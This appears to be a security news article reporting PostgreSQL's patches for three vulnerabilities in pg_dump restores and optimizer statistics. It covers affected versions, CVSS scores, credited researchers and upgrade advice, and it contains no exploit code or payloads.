The PostgreSQL Global Development Group has rolled out emergency security updates across all supported versions to fix three newly discovered vulnerabilities that expose organizations to arbitrary code execution risks during database restoration processes.
These vulnerabilities affect PostgreSQL versions 13 through 17, with security patches available in the latest releases: 17.6, 16.10, 15.14, 14.19, and 13.22.
Key Security Risks
- Attackers can inject and execute arbitrary code during restoration through pg_dump flaws.
- An optimizer statistics bug allows unauthorized access to restricted data.
- Organizations must upgrade immediately to the patched versions to mitigate these threats.
Exploitation Through pg_dump Utility
The flaws primarily target pg_dump, a widely used tool for PostgreSQL backups. By compromising backup files, attackers can transform routine database maintenance into an attack vector.
CVE-2025-8714 – Superuser Code Injection (CVSS 8.8)
The most severe flaw, CVE-2025-8714, allows malicious superusers on source servers to embed arbitrary code in backup files.
- The attack relies on psql meta-commands hidden in dumps.
- When administrators restore the backups, the code executes with the operating system privileges of the client machine.
- This issue affects pg_dump, pg_dumpall, and pg_restore.
Researchers Martin Rakhmanov, Matthieu Denais, and RyotaK are credited with discovering this vulnerability.
CVE-2025-8715 – Malicious Object Name Exploit (CVSS 8.8)
The second major flaw, CVE-2025-8715, abuses improper newline handling in object names inside pg_dump output.
- Attackers can craft maliciously formatted object names that inject commands.
- During restoration, these commands run in the psql client environment and may also trigger SQL injection on the target database.
- This bug is a regression of CVE-2012-0868, reintroduced in PostgreSQL 11.20.
- Affects pg_dumpall, pg_restore, and pg_upgrade.
This vulnerability was reported by Noah Misch, a PostgreSQL contributor.
CVE-2025-8713 – Information Disclosure via Optimizer Statistics (CVSS 3.1)
The third flaw, CVE-2025-8713, leaks restricted data through optimizer statistics.
- Attackers can view sampled rows from views, partitions, or child tables.
- This bypasses access control lists (ACLs) and row security policies.
Though less severe, it still presents data privacy risks.
Vulnerability Summary Table
| CVE ID | Title | CVSS v3.1 Score | Severity |
|---|---|---|---|
| CVE-2025-8714 | pg_dump lets superuser execute arbitrary code in psql | 8.8 | High |
| CVE-2025-8715 | pg_dump newline in object name executes arbitrary code | 8.8 | High |
| CVE-2025-8713 | Optimizer statistics expose sampled data in restricted views | 3.1 | Low |
Mitigation and Security Best Practices
Organizations must upgrade immediately to the patched versions:
- PostgreSQL 17.6, 16.10, 15.14, 14.19, 13.22 (released August 14, 2025).
Additional security measures include:
- Enforcing strict access controls for database tools.
- Avoiding restoration of dumps from untrusted sources.
- Applying the principle of least privilege for database administrators.
